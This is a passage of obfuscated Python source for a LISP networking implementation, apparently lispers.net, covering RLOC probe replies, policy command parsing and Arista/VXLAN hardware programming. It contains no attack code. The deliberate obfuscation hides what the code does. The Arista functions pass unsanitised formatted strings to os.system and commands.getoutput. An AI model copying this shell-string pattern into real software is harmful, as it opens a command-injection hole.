IiiIIi1 += ":" + str ( port )
lprint ( " Received unsolicited {} from {}/{}, port {}" . format ( OOO0oOooOOo00 , red ( i1Iii11 , False ) , red ( iiiI1 ,
# I1IiiI * I11i % i11iIiiIii * I1IiiI % Oo0Ooo
False ) , port ) )
return
if 90 - 90: Oo0Ooo % I1ii11iIi11i + OoOoOO00 % OoOoOO00 / OoOoOO00 . oO0o
if 73 - 73: I1Ii111 / II111iiii
if 61 - 61: IiII + Oo0Ooo - Oo0Ooo . II111iiii
if 70 - 70: i11iIiiIii - IiII
if 35 - 35: Ii1I + Ii1I + iIii1I11I1II1 + I1Ii111 * OoO0O00 % o0oOOo0O0Ooo
if 64 - 64: I1IiiI / OoOoOO00
if 89 - 89: o0oOOo0O0Ooo - OOooOOo * I1Ii111 . i1IIi % I1IiiI . I11i
if 99 - 99: I1Ii111 * ooOoO0o
for rloc , OOo0O0O0o0 , O0o00oOOOO00 in lisp_rloc_probe_list [ IiiIIi1 ] :
if ( lisp_i_am_rtr and rloc . translated_port != 0 and
rloc . translated_port != port ) : continue
if 9 - 9: I1Ii111
rloc . process_rloc_probe_reply ( nonce , OOo0O0O0o0 , O0o00oOOOO00 , hop_count , ttl )
if 26 - 26: iIii1I11I1II1 - I11i . Oo0Ooo - I1Ii111
return
if 3 - 3: I1IiiI + I1ii11iIi11i - I11i
if 15 - 15: OoOoOO00 . Oo0Ooo / ooOoO0o + Oo0Ooo - OoooooooOO - o0oOOo0O0Ooo
if 64 - 64: OOooOOo
if 44 - 44: O0 % ooOoO0o - iIii1I11I1II1 * i11iIiiIii . OoOoOO00
if 32 - 32: I1ii11iIi11i - iII111i
if 34 - 34: OOooOOo . i1IIi * o0oOOo0O0Ooo - I1Ii111 + I1ii11iIi11i
if 32 - 32: i11iIiiIii . I1Ii111
if 38 - 38: O0
def lisp_db_list_length ( ) :
OO = 0
for Ooooo00 in lisp_db_list :
OO += len ( Ooooo00 . dynamic_eids ) if Ooooo00 . dynamic_eid_configured ( ) else 1
OO += len ( Ooooo00 . eid . iid_list )
if 50 - 50: i11iIiiIii * OoO0O00 + iII111i / O0 * oO0o % ooOoO0o
return ( OO )
if 6 - 6: OoO0O00 . o0oOOo0O0Ooo / Ii1I + Ii1I
if 59 - 59: II111iiii - o0oOOo0O0Ooo * OoooooooOO
if 83 - 83: oO0o . iIii1I11I1II1 . iII111i % Oo0Ooo
if 48 - 48: oO0o % OoO0O00 - OoooooooOO . IiII
if 11 - 11: I1Ii111 % o0oOOo0O0Ooo - o0oOOo0O0Ooo % OoooooooOO . o0oOOo0O0Ooo - I1ii11iIi11i
if 33 - 33: OoO0O00 + II111iiii . Oo0Ooo * I1Ii111
if 63 - 63: OoooooooOO + OoOoOO00 - OoooooooOO
if 54 - 54: OoO0O00 + I1IiiI % O0 + OoO0O00
def lisp_is_myeid ( eid ) :
for Ooooo00 in lisp_db_list :
if ( eid . is_more_specific ( Ooooo00 . eid ) ) : return ( True )
if 37 - 37: II111iiii / I1ii11iIi11i * I1IiiI - OoooooooOO
return ( False )
if 55 - 55: IiII / ooOoO0o * I1IiiI / I1Ii111 - Oo0Ooo % o0oOOo0O0Ooo
if 82 - 82: OoO0O00 - iIii1I11I1II1 . Oo0Ooo / IiII . OoO0O00
if 47 - 47: OOooOOo + IiII
if 11 - 11: Oo0Ooo + I1IiiI % i11iIiiIii % Oo0Ooo + ooOoO0o + i1IIi
if 100 - 100: II111iiii - OOooOOo + iII111i - i11iIiiIii . O0 / iII111i
if 64 - 64: Ii1I
if 4 - 4: OoOoOO00
if 78 - 78: i1IIi - iII111i + O0 - I1IiiI % o0oOOo0O0Ooo
if 48 - 48: iII111i / II111iiii * I1Ii111 + I11i / ooOoO0o . OoOoOO00
def lisp_format_macs ( sa , da ) :
sa = sa [ 0 : 4 ] + "-" + sa [ 4 : 8 ] + "-" + sa [ 8 : 12 ]
da = da [ 0 : 4 ] + "-" + da [ 4 : 8 ] + "-" + da [ 8 : 12 ]
return ( "{} -> {}" . format ( sa , da ) )
if 45 - 45: OOooOOo / Ii1I % O0
if 7 - 7: oO0o * i11iIiiIii + OoooooooOO + I11i
if 9 - 9: II111iiii * Oo0Ooo * I1Ii111 . IiII
if 80 - 80: i11iIiiIii . i11iIiiIii . i11iIiiIii . OoooooooOO - OOooOOo * OoooooooOO
if 96 - 96: oO0o
if 80 - 80: IiII - oO0o % Ii1I - iIii1I11I1II1 . OoO0O00
if 64 - 64: I1IiiI % i11iIiiIii / oO0o
def lisp_get_echo_nonce ( rloc , rloc_str ) :
if ( lisp_nonce_echoing == False ) : return ( None )
if 78 - 78: II111iiii - Oo0Ooo . iIii1I11I1II1 - ooOoO0o . oO0o
if ( rloc ) : rloc_str = rloc . print_address_no_iid ( )
Oo0ooO0O0o00o = None
if ( lisp_nonce_echo_list . has_key ( rloc_str ) ) :
Oo0ooO0O0o00o = lisp_nonce_echo_list [ rloc_str ]
if 84 - 84: iII111i . ooOoO0o * I1IiiI * Oo0Ooo / I1Ii111
return ( Oo0ooO0O0o00o )
if 93 - 93: i1IIi * i11iIiiIii % OoOoOO00 % iII111i
if 31 - 31: OoO0O00
if 89 - 89: II111iiii
if 33 - 33: OOooOOo / oO0o % OoOoOO00 * O0
if 65 - 65: OoO0O00 % OoOoOO00 % I1ii11iIi11i / OoooooooOO
if 85 - 85: O0 * OOooOOo % I1Ii111
if 33 - 33: O0
if 30 - 30: II111iiii . O0 . oO0o * I1ii11iIi11i + oO0o . o0oOOo0O0Ooo
def lisp_decode_dist_name ( packet ) :
OO = 0
i1IoO = ""
if 10 - 10: oO0o
while ( packet [ 0 : 1 ] != "\0" ) :
if ( OO == 255 ) : return ( [ None , None ] )
i1IoO += packet [ 0 : 1 ]
packet = packet [ 1 : : ]
OO += 1
if 75 - 75: II111iiii % OOooOOo / iIii1I11I1II1 / OoO0O00 + oO0o
if 16 - 16: oO0o + I1Ii111 - II111iiii - o0oOOo0O0Ooo / i11iIiiIii
packet = packet [ 1 : : ]
return ( packet , i1IoO )
if 59 - 59: OOooOOo - o0oOOo0O0Ooo
if 82 - 82: IiII % ooOoO0o - OoO0O00 % ooOoO0o
if 51 - 51: ooOoO0o % iII111i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 20 - 20: i1IIi - ooOoO0o % OoooooooOO * I1ii11iIi11i + II111iiii % i1IIi
if 30 - 30: i11iIiiIii - I1IiiI + o0oOOo0O0Ooo + IiII
if 16 - 16: I1ii11iIi11i / Ii1I + I1ii11iIi11i * I1Ii111
if 49 - 49: ooOoO0o * OoOoOO00 . OoooooooOO . ooOoO0o + Oo0Ooo * IiII
if 47 - 47: iII111i . i1IIi . I1ii11iIi11i / OoooooooOO
def lisp_write_flow_log ( flow_log ) :
ii11I1IIi = open ( "./logs/lisp-flow.log" , "a" )
if 84 - 84: o0oOOo0O0Ooo * I11i
OO = 0
for i1ii11III1 in flow_log :
IIii1i = i1ii11III1 [ 3 ]
ii1Iii1 = IIii1i . print_flow ( i1ii11III1 [ 0 ] , i1ii11III1 [ 1 ] , i1ii11III1 [ 2 ] )
ii11I1IIi . write ( ii1Iii1 )
OO += 1
if 29 - 29: O0 - II111iiii % Oo0Ooo + I11i
ii11I1IIi . close ( )
del ( flow_log )
if 23 - 23: o0oOOo0O0Ooo + i11iIiiIii . I1IiiI + iIii1I11I1II1
OO = bold ( str ( OO ) , False )
lprint ( "Wrote {} flow entries to ./logs/lisp-flow.log" . format ( OO ) )
return
if 18 - 18: o0oOOo0O0Ooo . O0 + I1Ii111
if 66 - 66: OoooooooOO
if 90 - 90: IiII - OoOoOO00
if 98 - 98: Oo0Ooo / oO0o . Ii1I
if 56 - 56: ooOoO0o % OoO0O00 * i11iIiiIii % IiII % I1IiiI - oO0o
if 37 - 37: iII111i - Ii1I . oO0o
if 47 - 47: IiII / I1ii11iIi11i . o0oOOo0O0Ooo . ooOoO0o + OOooOOo . OOooOOo
def lisp_policy_command ( kv_pair ) :
III1I1Iii1 = lisp_policy ( "" )
iIII11III = None
if 9 - 9: iIii1I11I1II1 * OoO0O00
IIiIi11I = [ ]
for IiIIi1IiiIiI in range ( len ( kv_pair [ "datetime-range" ] ) ) :
IIiIi11I . append ( lisp_policy_match ( ) )
if 22 - 22: ooOoO0o . ooOoO0o % i1IIi * II111iiii * IiII
if 6 - 6: II111iiii . iII111i % I1ii11iIi11i + IiII / I11i
for i1II1I1II11I in kv_pair . keys ( ) :
i11II = kv_pair [ i1II1I1II11I ]
if 43 - 43: iII111i . I1Ii111 . OOooOOo
if 89 - 89: OoOoOO00 % O0
if 7 - 7: O0 % oO0o
if 57 - 57: i1IIi . OOooOOo
if ( i1II1I1II11I == "instance-id" ) :
for IiIIi1IiiIiI in range ( len ( IIiIi11I ) ) :
O0Oo0 = i11II [ IiIIi1IiiIiI ]
if ( O0Oo0 == "" ) : continue
o0o0OOO = IIiIi11I [ IiIIi1IiiIiI ]
if ( o0o0OOO . source_eid == None ) :
o0o0OOO . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 95 - 95: II111iiii + Ii1I % i11iIiiIii * i1IIi + OOooOOo - oO0o
if ( o0o0OOO . dest_eid == None ) :
o0o0OOO . dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 73 - 73: o0oOOo0O0Ooo . I1IiiI - I11i . ooOoO0o % II111iiii . OoooooooOO
o0o0OOO . source_eid . instance_id = int ( O0Oo0 )
o0o0OOO . dest_eid . instance_id = int ( O0Oo0 )
if 8 - 8: OoooooooOO
if 92 - 92: ooOoO0o + IiII * II111iiii
if ( i1II1I1II11I == "source-eid" ) :
for IiIIi1IiiIiI in range ( len ( IIiIi11I ) ) :
O0Oo0 = i11II [ IiIIi1IiiIiI ]
if ( O0Oo0 == "" ) : continue
o0o0OOO = IIiIi11I [ IiIIi1IiiIiI ]
if ( o0o0OOO . source_eid == None ) :
o0o0OOO . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 41 - 41: I1IiiI + OoOoOO00 . OOooOOo
o0OoO0000o = o0o0OOO . source_eid . instance_id
o0o0OOO . source_eid . store_prefix ( O0Oo0 )
o0o0OOO . source_eid . instance_id = o0OoO0000o
if 57 - 57: II111iiii . iIii1I11I1II1
if 32 - 32: o0oOOo0O0Ooo
if ( i1II1I1II11I == "destination-eid" ) :
for IiIIi1IiiIiI in range ( len ( IIiIi11I ) ) :
O0Oo0 = i11II [ IiIIi1IiiIiI ]
if ( O0Oo0 == "" ) : continue
o0o0OOO = IIiIi11I [ IiIIi1IiiIiI ]
if ( o0o0OOO . dest_eid == None ) :
o0o0OOO . dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 75 - 75: I1IiiI . II111iiii - iII111i % IiII * OoO0O00 % ooOoO0o
o0OoO0000o = o0o0OOO . dest_eid . instance_id
o0o0OOO . dest_eid . store_prefix ( O0Oo0 )
o0o0OOO . dest_eid . instance_id = o0OoO0000o
if 38 - 38: I1IiiI / OoooooooOO
if 16 - 16: i1IIi . i11iIiiIii . oO0o - I11i
if ( i1II1I1II11I == "source-rloc" ) :
for IiIIi1IiiIiI in range ( len ( IIiIi11I ) ) :
O0Oo0 = i11II [ IiIIi1IiiIiI ]
if ( O0Oo0 == "" ) : continue
o0o0OOO = IIiIi11I [ IiIIi1IiiIiI ]
o0o0OOO . source_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
o0o0OOO . source_rloc . store_prefix ( O0Oo0 )
if 96 - 96: iII111i - OoOoOO00
if 43 - 43: OoO0O00 - I1Ii111 % OoooooooOO % I1ii11iIi11i . OoOoOO00
if ( i1II1I1II11I == "destination-rloc" ) :
for IiIIi1IiiIiI in range ( len ( IIiIi11I ) ) :
O0Oo0 = i11II [ IiIIi1IiiIiI ]
if ( O0Oo0 == "" ) : continue
o0o0OOO = IIiIi11I [ IiIIi1IiiIiI ]
o0o0OOO . dest_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
o0o0OOO . dest_rloc . store_prefix ( O0Oo0 )
if 87 - 87: OOooOOo
if 60 - 60: ooOoO0o * o0oOOo0O0Ooo . OoO0O00 * iII111i * oO0o * i1IIi
if ( i1II1I1II11I == "rloc-record-name" ) :
for IiIIi1IiiIiI in range ( len ( IIiIi11I ) ) :
O0Oo0 = i11II [ IiIIi1IiiIiI ]
if ( O0Oo0 == "" ) : continue
o0o0OOO = IIiIi11I [ IiIIi1IiiIiI ]
o0o0OOO . rloc_record_name = O0Oo0
if 100 - 100: iII111i . o0oOOo0O0Ooo - I1Ii111 % oO0o
if 11 - 11: o0oOOo0O0Ooo . OoooooooOO - i1IIi
if ( i1II1I1II11I == "geo-name" ) :
for IiIIi1IiiIiI in range ( len ( IIiIi11I ) ) :
O0Oo0 = i11II [ IiIIi1IiiIiI ]
if ( O0Oo0 == "" ) : continue
o0o0OOO = IIiIi11I [ IiIIi1IiiIiI ]
o0o0OOO . geo_name = O0Oo0
if 71 - 71: I1IiiI . OOooOOo . I1ii11iIi11i
if 90 - 90: i11iIiiIii + I1Ii111 % II111iiii
if ( i1II1I1II11I == "elp-name" ) :
for IiIIi1IiiIiI in range ( len ( IIiIi11I ) ) :
O0Oo0 = i11II [ IiIIi1IiiIiI ]
if ( O0Oo0 == "" ) : continue
o0o0OOO = IIiIi11I [ IiIIi1IiiIiI ]
o0o0OOO . elp_name = O0Oo0
if 67 - 67: OoOoOO00 / iII111i * OoO0O00 % i11iIiiIii
if 76 - 76: OoO0O00
if ( i1II1I1II11I == "rle-name" ) :
for IiIIi1IiiIiI in range ( len ( IIiIi11I ) ) :
O0Oo0 = i11II [ IiIIi1IiiIiI ]
if ( O0Oo0 == "" ) : continue
o0o0OOO = IIiIi11I [ IiIIi1IiiIiI ]
o0o0OOO . rle_name = O0Oo0
if 92 - 92: iIii1I11I1II1 * O0 % I11i
if 92 - 92: OoOoOO00 + oO0o
if ( i1II1I1II11I == "json-name" ) :
for IiIIi1IiiIiI in range ( len ( IIiIi11I ) ) :
O0Oo0 = i11II [ IiIIi1IiiIiI ]
if ( O0Oo0 == "" ) : continue
o0o0OOO = IIiIi11I [ IiIIi1IiiIiI ]
o0o0OOO . json_name = O0Oo0
if 89 - 89: IiII % iII111i / iIii1I11I1II1 . Ii1I . Oo0Ooo + ooOoO0o
if 28 - 28: I1IiiI . iIii1I11I1II1
if ( i1II1I1II11I == "datetime-range" ) :
for IiIIi1IiiIiI in range ( len ( IIiIi11I ) ) :
O0Oo0 = i11II [ IiIIi1IiiIiI ]
o0o0OOO = IIiIi11I [ IiIIi1IiiIiI ]
if ( O0Oo0 == "" ) : continue
I1111III111ii = lisp_datetime ( O0Oo0 [ 0 : 19 ] )
i11iI1iIiI = lisp_datetime ( O0Oo0 [ 19 : : ] )
if ( I1111III111ii . valid_datetime ( ) and i11iI1iIiI . valid_datetime ( ) ) :
o0o0OOO . datetime_lower = I1111III111ii
o0o0OOO . datetime_upper = i11iI1iIiI
if 12 - 12: I1Ii111 * OOooOOo
if 11 - 11: II111iiii % O0 % O0 % o0oOOo0O0Ooo
if 45 - 45: OoooooooOO * oO0o
if 74 - 74: ooOoO0o * I11i / oO0o - IiII + OoOoOO00
if 16 - 16: Oo0Ooo
if 29 - 29: Oo0Ooo . I1ii11iIi11i / II111iiii / oO0o / o0oOOo0O0Ooo + I11i
if 4 - 4: OoooooooOO % I1ii11iIi11i . OoO0O00 * o0oOOo0O0Ooo + I1ii11iIi11i * IiII
if ( i1II1I1II11I == "set-action" ) :
III1I1Iii1 . set_action = i11II
if 67 - 67: I1IiiI
if ( i1II1I1II11I == "set-record-ttl" ) :
III1I1Iii1 . set_record_ttl = int ( i11II )
if 93 - 93: ooOoO0o . Ii1I + IiII / Oo0Ooo % I11i
if ( i1II1I1II11I == "set-instance-id" ) :
if ( III1I1Iii1 . set_source_eid == None ) :
III1I1Iii1 . set_source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 40 - 40: Oo0Ooo % OoOoOO00 . IiII / I1IiiI % OoooooooOO
if ( III1I1Iii1 . set_dest_eid == None ) :
III1I1Iii1 . set_dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 33 - 33: OOooOOo - OoooooooOO . iII111i
iIII11III = int ( i11II )
III1I1Iii1 . set_source_eid . instance_id = iIII11III
III1I1Iii1 . set_dest_eid . instance_id = iIII11III
if 2 - 2: I11i + i1IIi
if ( i1II1I1II11I == "set-source-eid" ) :
if ( III1I1Iii1 . set_source_eid == None ) :
III1I1Iii1 . set_source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 52 - 52: I11i - OoO0O00 % I1Ii111 . OOooOOo
III1I1Iii1 . set_source_eid . store_prefix ( i11II )
if ( iIII11III != None ) : III1I1Iii1 . set_source_eid . instance_id = iIII11III
if 90 - 90: O0 - Oo0Ooo / i1IIi * iIii1I11I1II1 % o0oOOo0O0Ooo / oO0o
if ( i1II1I1II11I == "set-destination-eid" ) :
if ( III1I1Iii1 . set_dest_eid == None ) :
III1I1Iii1 . set_dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 73 - 73: iII111i % iIii1I11I1II1 + o0oOOo0O0Ooo % Ii1I . II111iiii + IiII
III1I1Iii1 . set_dest_eid . store_prefix ( i11II )
if ( iIII11III != None ) : III1I1Iii1 . set_dest_eid . instance_id = iIII11III
if 55 - 55: OoOoOO00 * II111iiii / iII111i + OOooOOo / OoooooooOO
if ( i1II1I1II11I == "set-rloc-address" ) :
III1I1Iii1 . set_rloc_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
III1I1Iii1 . set_rloc_address . store_address ( i11II )
if 12 - 12: II111iiii * O0 - Oo0Ooo + o0oOOo0O0Ooo . Oo0Ooo + iIii1I11I1II1
if ( i1II1I1II11I == "set-rloc-record-name" ) :
III1I1Iii1 . set_rloc_record_name = i11II
if 4 - 4: I1Ii111 - I1Ii111 / I1ii11iIi11i . i1IIi + I1ii11iIi11i / oO0o
if ( i1II1I1II11I == "set-elp-name" ) :
III1I1Iii1 . set_elp_name = i11II
if 18 - 18: iIii1I11I1II1 . ooOoO0o
if ( i1II1I1II11I == "set-geo-name" ) :
III1I1Iii1 . set_geo_name = i11II
if 68 - 68: o0oOOo0O0Ooo
if ( i1II1I1II11I == "set-rle-name" ) :
III1I1Iii1 . set_rle_name = i11II
if 36 - 36: Oo0Ooo . I11i + I1IiiI * i1IIi % Ii1I + OOooOOo
if ( i1II1I1II11I == "set-json-name" ) :
III1I1Iii1 . set_json_name = i11II
if 5 - 5: o0oOOo0O0Ooo % oO0o / OoO0O00
if ( i1II1I1II11I == "policy-name" ) :
III1I1Iii1 . policy_name = i11II
if 17 - 17: OoooooooOO - I1ii11iIi11i / OoO0O00 - I1Ii111 + i1IIi
if 6 - 6: Oo0Ooo - II111iiii
if 33 - 33: I1Ii111 - I1IiiI + iII111i . OoOoOO00
if 91 - 91: OOooOOo / Ii1I / IiII * OOooOOo
if 68 - 68: I11i
if 91 - 91: I11i
III1I1Iii1 . match_clauses = IIiIi11I
III1I1Iii1 . save_policy ( )
return
if 24 - 24: ooOoO0o . i1IIi - O0 + I11i
if 71 - 71: OoOoOO00
lisp_policy_commands = {
"lisp policy" : [ lisp_policy_command , {
"policy-name" : [ True ] ,
"match" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"source-eid" : [ True ] ,
"destination-eid" : [ True ] ,
"source-rloc" : [ True ] ,
"destination-rloc" : [ True ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"datetime-range" : [ True ] ,
"set-action" : [ False , "process" , "drop" ] ,
"set-record-ttl" : [ True , 0 , 0x7fffffff ] ,
"set-instance-id" : [ True , 0 , 0xffffffff ] ,
"set-source-eid" : [ True ] ,
"set-destination-eid" : [ True ] ,
"set-rloc-address" : [ True ] ,
"set-rloc-record-name" : [ True ] ,
"set-elp-name" : [ True ] ,
"set-geo-name" : [ True ] ,
"set-rle-name" : [ True ] ,
"set-json-name" : [ True ] } ]
}
if 29 - 29: O0 . i11iIiiIii
if 51 - 51: IiII
if 53 - 53: O0
if 19 - 19: o0oOOo0O0Ooo / iII111i % OoOoOO00
if 65 - 65: o0oOOo0O0Ooo
if 89 - 89: iIii1I11I1II1 + OoooooooOO + i1IIi + OoooooooOO % IiII * OoO0O00
if 53 - 53: OOooOOo . IiII % I11i - OoO0O00 - Oo0Ooo
def lisp_send_to_arista ( command , interface ) :
interface = "" if ( interface == None ) else "interface " + interface
if 58 - 58: I1Ii111 / OoooooooOO . I11i % I1Ii111
iIi1iIi11i = command
if ( interface != "" ) : iIi1iIi11i = interface + ": " + iIi1iIi11i
lprint ( "Send CLI command '{}' to hardware" . format ( iIi1iIi11i ) )
if 66 - 66: O0 / I1ii11iIi11i . OoO0O00 . ooOoO0o * OoooooooOO
commands = '''
enable
configure
{}
{}
''' . format ( interface , command )
if 10 - 10: iII111i / OoOoOO00 + OOooOOo . OOooOOo
os . system ( "FastCli -c '{}'" . format ( commands ) )
return
if 81 - 81: I11i . II111iiii / OoOoOO00 * I1Ii111
if 18 - 18: o0oOOo0O0Ooo % i11iIiiIii . Ii1I . O0
if 85 - 85: I1ii11iIi11i * iIii1I11I1II1 + o0oOOo0O0Ooo * OoO0O00
if 25 - 25: o0oOOo0O0Ooo / Ii1I / Oo0Ooo . ooOoO0o - ooOoO0o * O0
if 14 - 14: O0 - Ii1I + iIii1I11I1II1 + II111iiii . ooOoO0o + Ii1I
if 25 - 25: OoO0O00 * oO0o
if 29 - 29: OOooOOo - I1Ii111 - i11iIiiIii % i1IIi
def lisp_arista_is_alive ( prefix ) :
ooO0ooooO = "enable\nsh plat trident l3 software routes {}\n" . format ( prefix )
Oo0Ooo0O0 = commands . getoutput ( "FastCli -c '{}'" . format ( ooO0ooooO ) )
if 2 - 2: i11iIiiIii % iIii1I11I1II1 * OOooOOo
if 45 - 45: oO0o + i1IIi + iII111i + o0oOOo0O0Ooo * OOooOOo + ooOoO0o
if 83 - 83: OoO0O00 - ooOoO0o / OoooooooOO % iIii1I11I1II1 - II111iiii
if 73 - 73: Oo0Ooo + II111iiii - IiII
Oo0Ooo0O0 = Oo0Ooo0O0 . split ( "\n" ) [ 1 ]
Ooii1 = Oo0Ooo0O0 . split ( " " )
Ooii1 = Ooii1 [ - 1 ] . replace ( "\r" , "" )
if 72 - 72: ooOoO0o + oO0o + IiII * I1Ii111 % oO0o
if 55 - 55: IiII . ooOoO0o - II111iiii * I1IiiI . I1Ii111
if 39 - 39: iIii1I11I1II1 . II111iiii + oO0o . iII111i + Ii1I
if 91 - 91: Ii1I + I1Ii111
return ( Ooii1 == "Y" )
if 7 - 7: ooOoO0o + I1ii11iIi11i % OoO0O00
if 45 - 45: i1IIi / o0oOOo0O0Ooo / iII111i * OoOoOO00 . IiII
if 60 - 60: o0oOOo0O0Ooo
if 63 - 63: i11iIiiIii * Oo0Ooo * I1Ii111
if 56 - 56: I1Ii111 . i11iIiiIii
if 76 - 76: II111iiii / ooOoO0o * i11iIiiIii . O0 / O0 - i11iIiiIii
if 89 - 89: o0oOOo0O0Ooo . I1Ii111 * I11i + oO0o - OoooooooOO + OoO0O00
if 25 - 25: i1IIi * I1Ii111 * iII111i . OoooooooOO
if 70 - 70: iIii1I11I1II1
if 1 - 1: II111iiii . I1IiiI + o0oOOo0O0Ooo
if 5 - 5: I1ii11iIi11i % I11i - II111iiii
if 70 - 70: ooOoO0o - IiII - OoO0O00 / I11i
if 59 - 59: IiII % ooOoO0o . iII111i / Ii1I * Ii1I
if 73 - 73: I1ii11iIi11i . oO0o % I11i . I1ii11iIi11i / I1Ii111 / II111iiii
if 23 - 23: OoooooooOO . o0oOOo0O0Ooo
if 76 - 76: I1Ii111
if 91 - 91: iIii1I11I1II1 / Ii1I . I1IiiI
if 63 - 63: ooOoO0o . Ii1I - I1Ii111 - oO0o * I1Ii111 + ooOoO0o
if 85 - 85: II111iiii + I1ii11iIi11i
if 33 - 33: iII111i
if 14 - 14: O0 * Oo0Ooo / i1IIi
if 95 - 95: O0 % i1IIi % ooOoO0o % oO0o - I1IiiI
if 78 - 78: II111iiii % OOooOOo
if 6 - 6: OOooOOo
if 21 - 21: I1Ii111 - Ii1I - i1IIi % oO0o
if 55 - 55: OOooOOo + oO0o - II111iiii
if 5 - 5: iII111i * OoooooooOO . OoO0O00 % ooOoO0o + Ii1I
if 59 - 59: OoOoOO00
if 96 - 96: I1IiiI
if 3 - 3: OoooooooOO
if 3 - 3: IiII / O0 * i11iIiiIii . iII111i - iIii1I11I1II1
if 56 - 56: ooOoO0o
if 82 - 82: ooOoO0o . IiII . I1Ii111 - iIii1I11I1II1 + II111iiii . OoOoOO00
if 59 - 59: Oo0Ooo
if 98 - 98: I1Ii111 * II111iiii / Oo0Ooo . Oo0Ooo % I1Ii111
if 52 - 52: OoOoOO00
if 59 - 59: ooOoO0o / OoooooooOO
if 71 - 71: OOooOOo + I11i * O0 / o0oOOo0O0Ooo + I1IiiI + Ii1I
if 41 - 41: ooOoO0o * I1Ii111
if 40 - 40: OoOoOO00
if 60 - 60: IiII . i11iIiiIii * II111iiii . Ii1I
if 10 - 10: O0
if 65 - 65: I11i % i11iIiiIii + i11iIiiIii % II111iiii
if 95 - 95: I1Ii111 - I11i . II111iiii . i1IIi / II111iiii + Oo0Ooo
def lisp_program_vxlan_hardware ( mc ) :
if 96 - 96: iIii1I11I1II1 * iII111i / OOooOOo * iIii1I11I1II1 - O0
if 28 - 28: I11i / I1IiiI - I1Ii111 + I1ii11iIi11i % iIii1I11I1II1
if 35 - 35: iIii1I11I1II1 % Oo0Ooo % iII111i / iIii1I11I1II1 - I1ii11iIi11i . Oo0Ooo
if 81 - 81: II111iiii + oO0o
if 67 - 67: ooOoO0o + I11i - I1ii11iIi11i - OoooooooOO
if 37 - 37: I11i % I1IiiI
if ( os . path . exists ( "/persist/local/lispers.net" ) == False ) : return
if 32 - 32: OOooOOo + OoooooooOO . IiII . Oo0Ooo * iII111i
if 86 - 86: I1ii11iIi11i . iII111i + Ii1I - IiII / i11iIiiIii + OoOoOO00
if 50 - 50: o0oOOo0O0Ooo - IiII + OoOoOO00 - II111iiii
if 24 - 24: I1Ii111 - IiII % I1IiiI - OoooooooOO % Ii1I
if ( len ( mc . best_rloc_set ) == 0 ) : return
if 56 - 56: I1ii11iIi11i
if 40 - 40: OoooooooOO
if 100 - 100: IiII - I11i
if 79 - 79: iII111i % O0
iIi1iIi1 = mc . eid . print_prefix_no_iid ( )
oOo00O = mc . best_rloc_set [ 0 ] . rloc . print_address_no_iid ( )
if 73 - 73: Oo0Ooo
if 13 - 13: OOooOOo - ooOoO0o
if 8 - 8: I1Ii111 % oO0o
if 19 - 19: O0 + OoO0O00 - i1IIi % OoOoOO00 / Oo0Ooo + OoooooooOO
Ooo00000oO = commands . getoutput ( "ip route get {} | egrep vlan4094" . format ( iIi1iIi1 ) )
if 54 - 54: OOooOOo + Oo0Ooo * o0oOOo0O0Ooo - iIii1I11I1II1 * ooOoO0o
if ( Ooo00000oO != "" ) :
lprint ( "Route {} already in hardware: '{}'" . format ( green ( iIi1iIi1 , False ) , Ooo00000oO ) )
if 76 - 76: i11iIiiIii * I1IiiI - IiII . o0oOOo0O0Ooo % iII111i . i11iIiiIii
return
if 69 - 69: O0 + o0oOOo0O0Ooo / ooOoO0o
if 7 - 7: Ii1I . Ii1I . iIii1I11I1II1 / ooOoO0o
if 70 - 70: O0
if 42 - 42: I1Ii111 + OoooooooOO + I11i
if 48 - 48: Oo0Ooo . IiII / ooOoO0o + I11i
if 40 - 40: I1IiiI + I1ii11iIi11i * I1IiiI % Ii1I
if 27 - 27: O0 / Oo0Ooo . oO0o
I1i11Ii11i = commands . getoutput ( "ifconfig | egrep 'vxlan|vlan4094'" )
if ( I1i11Ii11i . find ( "vxlan" ) == - 1 ) :
lprint ( "No VXLAN interface found, cannot program hardware" )
return
if 31 - 31: IiII - Ii1I . i1IIi
if ( I1i11Ii11i . find ( "vlan4094" ) == - 1 ) :
lprint ( "No vlan4094 interface found, cannot program hardware" )
return
if 1 - 1: o0oOOo0O0Ooo + OOooOOo % Ii1I - O0 / I1ii11iIi11i
II1ii1i = commands . getoutput ( "ip addr | egrep vlan4094 | egrep inet" )
if ( II1ii1i == "" ) :
lprint ( "No IP address found on vlan4094, cannot program hardware" )
return
if 88 - 88: O0 + iIii1I11I1II1 . o0oOOo0O0Ooo . iIii1I11I1II1 - Ii1I
II1ii1i = II1ii1i . split ( "inet " ) [ 1 ]
II1ii1i = II1ii1i . split ( "/" ) [ 0 ]
if 74 - 74: Ii1I . IiII
if 67 - 67: oO0o
if 12 - 12: I1IiiI + OoooooooOO
if 25 - 25: iIii1I11I1II1 - I1IiiI . i11iIiiIii + ooOoO0o
if 19 - 19: OoooooooOO / IiII
if 40 - 40: OoOoOO00 / OoooooooOO * iIii1I11I1II1 / i1IIi . OoooooooOO
if 88 - 88: I1IiiI % I1IiiI / II111iiii - IiII
OOoOoOO0 = [ ]
IioOOO0O0o = commands . getoutput ( "arp -i vlan4094" ) . split ( "\n" )
for oOOo0ooO0 in IioOOO0O0o :
if ( oOOo0ooO0 . find ( "vlan4094" ) == - 1 ) : continue
if ( oOOo0ooO0 . find ( "(incomplete)" ) == - 1 ) : continue
iiIIII1I1ii = oOOo0ooO0 . split ( " " ) [ 0 ]
OOoOoOO0 . append ( iiIIII1I1ii )
if 19 - 19: OoooooooOO
if 28 - 28: i11iIiiIii / O0 / iIii1I11I1II1 / I1IiiI % OoooooooOO % ooOoO0o
